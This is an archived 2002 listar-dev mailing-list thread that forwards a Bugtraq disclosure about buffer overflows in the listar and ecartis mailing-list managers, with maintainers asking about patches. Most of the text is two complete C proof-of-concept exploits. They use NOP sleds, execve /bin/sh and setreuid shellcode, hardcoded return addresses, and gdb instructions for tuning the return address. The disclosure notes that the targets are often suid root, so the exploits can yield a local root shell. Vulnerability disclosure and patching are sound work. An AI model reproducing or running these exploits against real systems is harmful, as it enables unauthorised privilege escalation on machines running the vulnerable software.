[prev in list] [next in list] [prev in thread] [next in thread]
List: listar-dev
Subject: [EDev] Fwd: [dotslash@snosoft.com: ecartis / listar PoC]
From: John Goerzen <jgoerzen () complete ! org>
Date: 2002-04-26 18:26:33
[Download RAW message or body]
Any word or patches for this problem?
Begin forwarded message:
> From: Wichert Akkerman <wichert@wiggy.net>
> Date: Fri Apr 26, 2002 12:21:30 PM America/Indianapolis
> To: listar@packages.debian.org
> Subject: [dotslash@snosoft.com: ecartis / listar PoC]
>
> Not sure if the current packages are vulnerable or not, you
> might want to check just in case.
>
> Wichert.
>
> ----- Forwarded message from KF <dotslash@snosoft.com> -----
>
> From: KF <dotslash@snosoft.com>
> To: vuln-dev@securityfocus.com, bugtraq@securityfocus.com
> Subject: ecartis / listar PoC
> Date: Wed, 24 Apr 2002 18:56:01 -0700
> X-Spam-Status: No, hits=0.0 required=5.0 tests= version=2.20
> X-Spam-Level:
>
> Heres some code for this post a while back ...
> http://online.securityfocus.com/archive/82/258763
> This is NOT the same issue in the my_strings.c there are MULTIPLE issues
> in ecartis still and the same goes for listar...
> This issue is a strcpy from argv to a fixed buffer .... nothing special.
>
> ecartis and listar are one in the same... depending on how you install
> either one it could be a root exploit or it could be a non priv account
> exploit. I have seen alot of listar installs suid root...
>
> -KF
>
>
>
>
> /*
> * /home/listar-0.129a/listar
> *
> * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
> * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
> *
> * This exploit was developed on the Snosoft vulnerability research
> machines
> *
> * - The Itch
> * - itchie@promisc.org
> *
> * - Technical details concerning the exploit -
> *
> * 1) Buffer overflow occurs after writing 990 bytes into the buffer at
> the command line
> * (990 to overwrite ebp, 996 to overwrite eip).
> * 2) The code string with the return address will be unaligned.
> *
> */
>
> #include <stdio.h>
> #include <stdlib.h>
>
> #define DEFAULT_EGG_SIZE 2048
> #define NOP 0x90
> #define DEFAULT_BUFFER_SIZE 1000
>
> char shellcode[] =
> "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
>
> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>
> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
> "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>
> int main(int argc, char *argv[])
> {
> char *buff;
> char *egg;
> char *ptr;
> long *addr_ptr;
> long addr;
> int bsize = DEFAULT_BUFFER_SIZE;
> int eggsize = DEFAULT_EGG_SIZE;
> int i;
> int get_sp = 0xbffff4e0;
>
> if(argc > 1) { bsize = atoi(argv[1]); }
>
> if(!(buff = malloc(bsize)))
> {
> printf("unable to allocate memory for %d bytes\n",
> bsize);
> exit(1);
> }
>
> if(!(egg = malloc(eggsize)))
> {
> printf("unable to allocate memory for %d bytes\n",
> eggsize);
> exit(1);
> }
>
> printf("/home/listar-0.129a/listar\n");
> printf("Vulnerability found by KF / http://www.snosoft.com\n");
> printf("Coded by The Itch / http://www.promisc.org\n\n");
> printf("Using return address: 0x%x\n", get_sp);
> printf("Using buffersize : %d\n", bsize);
>
> /* alignment */
> ptr = buff + 2;
>
> addr_ptr = (long *) ptr;
> for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }
>
> ptr = egg;
> for(i = 0; i < eggsize - strlen(shellcode) -1; i++)
> {
> *(ptr++) = NOP;
> }
>
> for(i = 0; i < strlen(shellcode); i++)
> {
> *(ptr++) = shellcode[i];
> }
>
> egg[eggsize - 1] = '\0';
> buff[bsize -1] = '\0';
> memcpy(buff, "RET=", 4);
> memcpy(egg, "EGG=", 4);
> putenv(buff);
> putenv(egg);
> system("/home/listar-0.129a/listar $RET");
>
> return 0;
> }
>
> /*
> * /home/ecartis/ecartis
> *
> * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
> * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
> * Shellcode created by r0z / Promisc (r0z@promisc.org)
> *
> * This exploit was developed on the Snosoft vulnerability research
> machines
> *
> * - The Itch
> * - itchie@promisc.org
> *
> * - Technical details concerning the exploit -
> *
> * 1) Buffer overflow occurs after writing 996 bytes into the buffer at
> the command line
> * (996 to overwrite ebp, 1000 to overwrite eip).
> * 2) The code string with the return address will be unaligned.
> * 3) Shellcode will try to do a setreuid(508);
> *
> * I had trouble reaching my own buffer in the enviroment dynamicly, so
> i gdb'ed it.
> * If the exploit fails, comment the system() that runs ecarthis,
> uncomment the other system()
> * The run this exploit, you will be in bash then, do: gdb
> /home/ecartis/ecartis
> * in gdb, type: run $RET
> * The program will probably then segfault, then type: x/200x $esp and
> press enter a couply of times
> * until you see alot of 0x90909090. Then pick on of those address and
> replace it with the
> * int get_sp = 0xbffff550. Change the system() commands below back as
> how they were and rerun the exploit.
> *
> */
>
> #include <stdio.h>
> #include <stdlib.h>
>
> #define DEFAULT_EGG_SIZE 2048
> #define NOP 0x90
> #define DEFAULT_BUFFER_SIZE 1000
>
>
> /* setreuid(508); execve("/bin/sh", "sh", 0); (c) r0z@promisc.org */
> char shellcode[] =
> "\x31\xdb" /* xor %ebx, %ebx */
> "\x31\xc9" /* xor %ecx, %ecx */
> "\xf7\xe3" /* mul %ebx */
> "\xb0\x46" /* mov $0x46, %al */
> "\x66\xbb\xfc\x01" /* mov $0x1fc, %bx */
> "\x49" /* dec %ecx */
> "\xcd\x80" /* int $0x80 */
> "\x31\xd2" /* xor %edx, %edx */
> "\x52" /* push %edx */
> "\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */
> "\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */
> "\x89\xe3" /* mov %esp, %ebx */
> "\x52" /* push %edx */
> "\x53" /* push %ebx */
> "\x89\xe1" /* mov %esp, %ecx */
> "\x6a\x0b" /* pushl $0xb */
> "\x58" /* pop %eax */
> "\xcd\x80"; /* int $0x80 */
>
> int main(int argc, char *argv[])
> {
> char *buff;
> char *egg;
> char *ptr;
> long *addr_ptr;
> long addr;
> int bsize = DEFAULT_BUFFER_SIZE;
> int eggsize = DEFAULT_EGG_SIZE;
> int i;
> int get_sp = 0xbffff550;
>
> if(argc > 1) { bsize = atoi(argv[1]); }
>
> if(!(buff = malloc(bsize)))
> {
> printf("unable to allocate memory for %d bytes\n",
> bsize);
> exit(1);
> }
>
> if(!(egg = malloc(eggsize)))
> {
> printf("unable to allocate memory for %d bytes\n",
> eggsize);
> exit(1);
> }
>
> printf("/home/ecartis/ecartis\n");
> printf("Vulnerability found by KF / http://www.snosoft.com\n");
> printf("Coded by The Itch / http://www.promisc.org\n\n");
> printf("Using return address: 0x%x\n", get_sp);
> printf("Using buffersize : %d\n", bsize);
>
> /* alignment */
> ptr = buff + 2;
>
> addr_ptr = (long *) ptr;
> for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }
>
> ptr = egg;
> for(i = 0; i < eggsize - strlen(shellcode) -1; i++)
> {
> *(ptr++) = NOP;
> }
>
> for(i = 0; i < strlen(shellcode); i++)
> {
> *(ptr++) = shellcode[i];
> }
>
> egg[eggsize - 1] = '\0';
> memcpy(egg, "EGG=", 4);
> putenv(egg);
> buff[bsize - 1] = '\0';
> memcpy(buff, "RET=", 4);
> putenv(buff);
> system("/home/ecartis/ecartis $RET");
> // system("/bin/bash");
>
> return 0;
> }
>
>
> ----- End forwarded message -----
>
> --
> _________________________________________________________________
> /wichert@wiggy.net This space intentionally left occupied \
> | wichert@deephackmode.org http://www.liacs.nl/~wichert/ |
> | 1024D/2FA3BC2D 576E 100B 518D 2F16 36B0 2805 3CB8 9250 2FA3 BC2D |
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic